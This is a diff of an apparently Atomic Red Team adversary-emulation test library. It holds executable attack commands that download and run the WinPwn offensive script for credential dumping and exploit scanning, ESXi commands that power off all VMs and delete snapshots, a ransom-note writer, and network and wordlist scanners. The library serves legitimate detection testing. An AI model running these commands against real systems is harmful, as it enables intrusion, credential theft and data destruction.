       auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
       description: View information about all of the resources that are shared on
-        the local computer Upon execution, avalaible share drives will be displayed
+        the local computer Upon execution, available share drives will be displayed
         in the powershell session
       supported_platforms:
       - windows
@@ -84277,7 +84795,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           shareenumeration -noninteractive -consoleoutput
         name: powershell
@@ -84285,7 +84802,7 @@ discovery:
       auto_generated_guid: 13daa2cf-195a-43df-a8bd-7dd5ffb607b5
       description: |
         Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip
-        Upon execution avalaible network shares will be displayed in the commandline session
+        Upon execution available network shares will be displayed in the commandline session
       supported_platforms:
       - windows
       input_arguments:
@@ -84436,7 +84953,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           printercheck -noninteractive -consoleoutput
         name: powershell
@@ -84633,7 +85149,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           winPEAS -noninteractive -consoleoutput
         name: powershell
@@ -84645,7 +85160,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           itm4nprivesc -noninteractive -consoleoutput
         name: powershell
@@ -84656,7 +85170,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           oldchecks -noninteractive -consoleoutput
         cleanup_command: |-
@@ -84673,7 +85186,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           otherchecks -noninteractive -consoleoutput
         name: powershell
@@ -84685,7 +85197,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Generalrecon -consoleoutput -noninteractive
         name: powershell
@@ -84697,7 +85208,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Morerecon -noninteractive -consoleoutput
         name: powershell
@@ -84709,7 +85219,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           RBCD-Check -consoleoutput -noninteractive
         name: powershell
@@ -84962,7 +85471,37 @@ discovery:
       - windows
       executor:
         name: command_prompt
-        command: powershell.exe -c "gdr -PSProvider 'FileSystem'"
+        command: 'powershell.exe -c "gdr -PSProvider ''FileSystem''"
+
+          '
+    - name: Discover OS Product Name via Registry
+      auto_generated_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7
+      description: |
+        Identify the Operating System Product Name via registry with the reg.exe command.
+        Upon execution, the OS Product Name will be displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
+          ProductName
+
+          '
+        name: command_prompt
+        elevation_required: false
+    - name: Discover OS Build Number via Registry
+      auto_generated_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec
+      description: |
+        Identify the Operating System Build Number via registry with the reg.exe command.
+        Upon execution, the OS Build Number will be displayed.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
+          CurrentBuildNumber
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1016.002:
     technique:
       modified: '2023-10-05T11:35:30.887Z'
@@ -85692,7 +86231,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -85980,7 +86519,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -86012,7 +86551,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -87480,7 +88019,59 @@ discovery:
       executor:
         name: command_prompt
         elevation_required: false
-        command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
+        command: 'PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
+
+          '
+    - name: Discover System Language with WMIC
+      auto_generated_guid: 4758003d-db14-4959-9c0f-9e87558ac69e
+      description: "WMIC (Windows Management Instrumentation Command-line) is a command-line
+        tool that provides a simplified interface to query and manage Windows system
+        configurations, processes, and hardware information using WMI. \n\nThe command
+        in this test retrieves information about the system's locale, operating system
+        language, and multilingual user interface (MUI) languages.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_host:
+          description: "The host that will be queried.\n\nIf the host contains special
+            characters, it may need to be wrapped in double quotes or double + single
+            quotes. \n\nFor example: \"DESKTOP-123\" or \"'DESKTOP-123'\".\n"
+          type: string
+          default: localhost
+        format_style:
+          description: You can specify multipe output formats for wmic such as table,
+            list and csv.
+          type: string
+          default: table
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'wmic /node:#{target_host} os get Locale,OSLanguage,MUILanguages
+          /format:#{format_style}
+
+          '
+    - name: Discover System Language with Powershell
+      auto_generated_guid: 1f23bfe8-36d4-49ce-903a-19a1e8c6631b
+      description: "This PowerShell script collects key system settings, such as the
+        UI language, user language preferences, system locale, current culture, UI
+        culture, and time zone, into a hash table. \n\nIt then outputs these settings
+        in a readable key-value format directly to the terminal. The script is simple
+        and efficient for quickly displaying system configuration details.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |-
+          $info = @{
+            UILanguage     = Get-WinUILanguageOverride
+            UserLanguages  = (Get-WinUserLanguageList).LanguageTag -join ', '
+            SystemLocale   = Get-WinSystemLocale
+            CurrentCulture = [System.Globalization.CultureInfo]::CurrentCulture.Name
+            CurrentUICulture = [System.Globalization.CultureInfo]::CurrentUICulture.Name
+            TimeZone       = (Get-TimeZone).Id
+          }
+          $info.GetEnumerator() | ForEach-Object { "$($_.Name): $($_.Value)" }
   T1012:
     technique:
       modified: '2023-04-03T18:56:37.011Z'
@@ -88287,7 +88878,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -88319,7 +88910,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -88609,7 +89200,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           spoolvulnscan -noninteractive -consoleoutput
         name: powershell
@@ -88621,7 +89211,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           MS17-10 -noninteractive -consoleoutput
         name: powershell
@@ -88634,7 +89223,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           bluekeep -noninteractive -consoleoutput
         name: powershell
@@ -88646,7 +89234,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           fruit -noninteractive -consoleoutput
         name: powershell
@@ -88660,7 +89247,9 @@ discovery:
       input_arguments:
         ip_address:
           description: IP-Address within the target subnet. Default is empty and script
-            tries to determine local IP address of attacking machine.
+            tries to determine local IP address of attacking machine. A comma separated
+            list of targe IPs is also accepted (useful to simulate a wider scan while
+            only scanning key host e.g., honeypots)
           type: string
           default: ''
         port_list:
@@ -88672,33 +89261,58 @@ discovery:
           type: string
           default: '200'
       executor:
-        command: |
+        command: |-
           $ipAddr = "#{ip_address}"
-          if ($ipAddr -eq "") {
-              # Assumes the "primary" interface is shown at the top
-              $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
-              Write-Host "[i] Using Interface $interface"
-              $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
-          }
-          Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
-          $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
-          # Always assumes /24 subnet
-          Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+          if ($ipAddr -like "*,*") {
+              $ip_list = $ipAddr -split ","
+              $ip_list = $ip_list.ForEach({ $_.Trim() })
+              Write-Host "[i] IP Address List: $ip_list"
 
-          $ports = #{port_list}
-          $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+              $ports = #{port_list}
 
-          foreach ($ip in $subnetIPs) {
-              foreach ($port in $ports) {
-                try {
-                    $tcp = New-Object Net.Sockets.TcpClient
-                    $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
-                } catch {}
-                if ($tcp.Connected) {
-                    $tcp.Close()
-                    Write-Host "Port $port is open on $ip"
-                }
+              foreach ($ip in $ip_list) {
+                  foreach ($port in $ports) {
+                      Write-Host "[i] Establishing connection to: $ip : $port"
+                      try {
+                          $tcp = New-Object Net.Sockets.TcpClient
+                          $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                      } catch {}
+                      if ($tcp.Connected) {
+                          $tcp.Close()
+                          Write-Host "Port $port is open on $ip"
+                      }
+                  }
               }
+          } elseif ($ipAddr -notlike "*,*") {
+              if ($ipAddr -eq "") {
+                  # Assumes the "primary" interface is shown at the top
+                  $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+                  Write-Host "[i] Using Interface $interface"
+                  $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+              }
+              Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+              $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+              # Always assumes /24 subnet
+              Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+              $ports = #{port_list}
+              $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+              foreach ($ip in $subnetIPs) {
+                  foreach ($port in $ports) {
+                      try {
+                          $tcp = New-Object Net.Sockets.TcpClient
+                          $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                      } catch {}
+                      if ($tcp.Connected) {
+                          $tcp.Close()
+                          Write-Host "Port $port is open on $ip"
+                      }
+                  }
+              }
+          } else {
+              Write-Host "[Error] Invalid Inputs"
+              exit 1
           }
         name: powershell
     - name: Remote Desktop Services Discovery via PowerShell
@@ -88796,7 +89410,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Dotnetsearch -noninteractive -consoleoutput
         name: powershell
@@ -88808,7 +89421,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           dotnet -consoleoutput -noninteractive
         name: powershell
@@ -88819,7 +89431,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           powerSQL -noninteractive -consoleoutput
         name: powershell
@@ -89123,6 +89734,20 @@ discovery:
 
           '
         name: command_prompt
+    - name: Discover System Time Zone via Registry
+      auto_generated_guid: 25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47
+      description: |
+        Identify the Operating System Time Zone via registry with the reg.exe command.
+        Upon execution, the system Time Zone will be shown.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
+          /v TimeZoneKeyName
+
+          '
+        name: command_prompt
+        elevation_required: false
 resource-development:
   T1583:
     technique:
@@ -93926,7 +94551,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -93944,7 +94569,41 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1595.003
+    atomic_tests:
+    - name: Web Server Wordlist Scan
+      auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
+      description: 'This test will scan a target system with a wordlist of common
+        directories and file paths.
+
+        '
+      supported_platforms:
+      - windows
+      - linux
+      - macos
+      input_arguments:
+        target:
+          description: The target system to scan
+          type: string
+          default: http://localhost
+        wordlist:
+          description: The wordlist to use for scanning
+          type: path
+          default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
+        request_timeout:
+          description: The timeout for each request (in seconds)
+          type: integer
+          default: 5
+        output_file:
+          description: File to output results to
+          type: string
+          default: "$env:TMPDIR/wordlist_scan.txt"
+      executor:
+        command: |
+          Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
+          Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
+          Write-Host "Scan complete. Results saved to: #{output_file}"
+        name: powershell
   T1591.004:
     technique:
       x_mitre_platforms:
@@ -95688,6 +96347,48 @@ impact:
           Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
         name: powershell
         elevation_required: true
+    - name: ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
+      auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810
+      description: |
+        Changes the ESXi welcome message to potentially display ransom information.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#change%20display%20information)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli system welcomemsg set -m ''RANSOMWARE-NOTIFICATION''"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1496.004:
     technique:
       modified: '2024-10-16T17:59:27.535Z'
@@ -96204,7 +96905,9 @@ impact:
           type: path
           default: "$env:temp\\test.txt"
       dependencies:
-      - description: 'GPG must exist at (#{GPG_Exe_Location})
+      - description: 'GPG must exist at (#{GPG_Exe_Location}). If -GetPrereqs fails,
+          try to install GPG4WIN manually at ''https://www.gpg4win.org/download.html''.
+          Once done, run -CheckPrereqs to confirm that it works.
 
           '
         prereq_command: 'if (test-path ''#{GPG_Exe_Location}''){exit 0} else {exit
@@ -96212,19 +96915,19 @@ impact:
 
           '
         get_prereq_command: |
+          Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text"  # Create the test.txt file
           New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
           invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
           cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S
       executor:
         name: powershell
         elevation_required: false
-        command: 'cmd /c ''#{GPG_Exe_Location}'' -c ''#{File_to_Encrypt_Location}''
-
-          '
-        cleanup_command: 'remove-item ''#{File_to_Encrypt_Location}.gpg'' -force -erroraction
-          silentlycontinue | out-null
-
-          '
+        command: |
+          Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text"  # Create the test.txt file again in case prereqs failed
+          cmd /c "`"C:\Program Files (x86)\GnuPG\bin\gpg.exe`" --passphrase 'SomeParaphraseBlah' --batch --yes -c `"#{File_to_Encrypt_Location}`""
+        cleanup_command: |
+          Remove-Item -Path "#{File_to_Encrypt_Location}" -Force -ErrorAction SilentlyContinue
+          Remove-Item -Path "#{File_to_Encrypt_Location}.gpg" -Force -ErrorAction SilentlyContinue
     - name: Data Encrypt Using DiskCryptor
       auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30
       description: 'DiskCryptor, an open source encryption utility, can be exploited
@@ -96293,7 +96996,7 @@ impact:
           echo "If you' re indeed interested in our assistance and the services we provide you can reach out to us following simple instructions:" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "1. Install TOR Browser to get access to our chat room - https://www.torproject.org/download/." >> $env:Userprofile\Desktop\akira_readme.txt
-          echo "2. Paste this link — https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
+          echo "2. Paste this link - https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "3. Use this code - - to log into our chat." >> $env:Userprofile\Desktop\akira_readme.txt
           echo "" >> $env:Userprofile\Desktop\akira_readme.txt
           echo "Keep in mind that the faster you will get in touch, the less damage we cause" >> $env:Userprofile\Desktop\akira_readme.txt
@@ -96661,6 +97364,49 @@ impact:
 
           '
         name: command_prompt
+    - name: ESXi - Delete VM Snapshots
+      auto_generated_guid: 1207ddff-f25b-41b3-aa0e-7c26d2b546d1
+      description: |
+        Deletes all snapshots for all Virtual Machines on an ESXi Host
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
+          $1}''`; do vim-cmd vmsvc/snapshot.removeall $i & done"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1498:
     technique:
       modified: '2024-10-15T16:01:00.510Z'
@@ -97389,6 +98135,49 @@ impact:
           '
         name: command_prompt
         elevation_required: false
+    - name: ESXi - vim-cmd Used to Power Off VMs
+      auto_generated_guid: 622cc1a0-45e7-428c-aed7-c96dd605fbe6
+      description: |
+        Adversaries may power off VMs to facilitate the deployment of ransomware payloads.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#power%20off%20vm)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
+          $1}''`; do vim-cmd vmsvc/power.off $i & done"
+
+          '
+        name: command_prompt
+        elevation_required: false
 initial-access:
   T1133:
     technique:
@@ -99254,7 +100043,6 @@ initial-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -99266,7 +100054,6 @@ initial-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           safedump -consoleoutput -noninteractive
         name: powershell
@@ -100193,7 +100980,7 @@ exfiltration:
           description: Set to '-b32' to use base32 encoding of data. Might be required
             by some DNS resolvers.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'DNSExfiltrator powershell file must exist on disk at specified
@@ -100817,11 +101604,11 @@ exfiltration:
         username:
           description: Username for FTP server login
           type: string
-          default: 
+          default:
         password:
           description: Password for FTP server login
           type: string
-          default: 
+          default:
       executor:
         command: |
           $Dir_to_copy = "$env:windir\temp"

atomics/T1001.002/T1001.002.md

@@ -1,6 +1,10 @@
 # T1001.002 - Data Obfuscation via Steganography
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
-<blockquote>Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </blockquote>
+<blockquote>
+
+Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. 
+
+</blockquote>
 
 ## Atomic Tests
 
@@ -83,7 +87,7 @@ if (!(Test-Path "#{passwords_file}")) {exit 1} else {
 ##### Get Prereq Commands:
 ```powershell
 Write-Output "Generating random passwords and saving to file..."
-$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
+$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
 $passwords | Out-File -FilePath "#{passwords_file}"
 ```
 ##### Description: Tarz file to embed in image must exist

atomics/T1001.002/T1001.002.yaml

@@ -54,7 +54,7 @@ atomic_tests:
         }
       get_prereq_command: |
         Write-Output "Generating random passwords and saving to file..."
-        $passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
+        $passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
         $passwords | Out-File -FilePath "#{passwords_file}"    
     - description: |
         Tarz file to embed in image must exist 

atomics/T1003.001/T1003.001.md

@@ -1,6 +1,8 @@
 # T1003.001 - OS Credential Dumping: LSASS Memory
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
